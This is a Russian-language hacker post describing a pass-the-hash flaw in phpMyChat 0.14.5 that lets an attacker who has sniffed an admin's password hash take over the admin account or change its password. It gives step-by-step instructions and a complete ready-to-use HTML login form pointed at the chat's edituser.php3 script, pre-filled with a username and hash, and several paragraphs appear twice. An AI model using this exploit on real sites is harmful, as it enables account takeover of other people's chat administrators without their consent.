Привет! Я нашел уязвимость в phpMyChat 0.14.5 ,и более поздние версии (может ее и до меня нашли, но вроде я таких уязвимостей не встречал). Суть в том: можно изменить пасс админу (любому пользователю), можно зайти под него ником в чат.
Для этого надо знать его ник и хеш (хеш не надо расшифровывать).
Допустим, мы узнали с помощью снифера хеш админа. Изменим ему пасс. Вот код страницы
Для этого в поле:<INPUT TYPE="text" NAME="AUTH_USERNAME" SIZE=11 MAXLENGTH=10 VALUE="" CLASS="ChatBox"> после слова VALUE пишем его ник.
В поле <INPUT TYPE="password" NAME="AUTH_PASSWORD" SIZE=11 MAXLENGTH=16 VALUE="" CLASS="ChatBox"> после слова VALUE пишем его хеш.
Все сохраняем страницу в html и нажимаем "Войти" меняем пасс можно и ник и теперь мы админы. Если что-то не понятно пишите kalnin2006@yandex.ru или стучите в асю: 255553398.
Извините если что не понятно это моя первая уязвимость!!!
"The pirats of a network" www.pirats.jino-net.ru
Для этого надо знать его ник и хеш (хеш не надо расшифровывать).
Допустим, мы узнали с помощью снифера хеш админа. Изменим ему пасс. Вот код страницы
Код:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML dir="LTR">
<HEAD>
<title>Книга посетителей</title>
<LINK REL="stylesheet" HREF="config/start_page.css.php3?Charset=windows-1251&medium=10&FontName=" TYPE="text/css">
<script TYPE="text/javascript" LANGUAGE="JavaScript1.1">
<!--
function get_focus()
{
window.focus();
document.forms['LoginForm'].elements['AUTH_USERNAME'].focus();
}
// -->
</SCRIPT>
</HEAD>
<BODY onLoad="if (window.focus) get_focus();">
<CENTER>
<FORM ACTION="http://www.site.ru/chat/edituser.php3" METHOD="POST" AUTOCOMPLETE="OFF" NAME="LoginForm">
<P></P>
<INPUT TYPE="hidden" NAME="L" VALUE="russian">
<INPUT TYPE="hidden" NAME="Link" VALUE="1">
<INPUT TYPE="hidden" NAME="LIMIT" VALUE="">
<TABLE BORDER=0 CELLPADDING=3 CLASS="table">
<TR>
<TD ALIGN="CENTER">
<TABLE BORDER=0>
<TR>
<TH COLSPAN=2 CLASS="tabtitle">Вход в ЧатВиллу</TH>
</TR>
<TR>
<TD VALIGN="TOP" NOWRAP>Ник :</TD>
<TD VALIGN="TOP">
<INPUT TYPE="text" NAME="AUTH_USERNAME" SIZE=11 MAXLENGTH=10 VALUE="Pr13raK" CLASS="ChatBox">
</TD>
</TR>
<TR>
<TD VALIGN="TOP" NOWRAP>Пароль :</TD>
<TD VALIGN="TOP">
<INPUT TYPE="password" NAME="AUTH_PASSWORD" SIZE=11 MAXLENGTH=16 VALUE="310dcbbf4cce62f762a2aaa148d556bd" CLASS="ChatBox">
</TD>
</TR>
</TABLE>
<P>
<INPUT TYPE="submit" VALUE="Входим" CLASS="ChatBox">
</TD>
</TR>
</TABLE>
</FORM>
</CENTER>
</BODY>
</HTML>
В поле <INPUT TYPE="password" NAME="AUTH_PASSWORD" SIZE=11 MAXLENGTH=16 VALUE="" CLASS="ChatBox"> после слова VALUE пишем его хеш.
Все сохраняем страницу в html и нажимаем "Войти" меняем пасс можно и ник и теперь мы админы. Если что-то не понятно пишите kalnin2006@yandex.ru или стучите в асю: 255553398.
Извините если что не понятно это моя первая уязвимость!!!
"The pirats of a network" www.pirats.jino-net.ru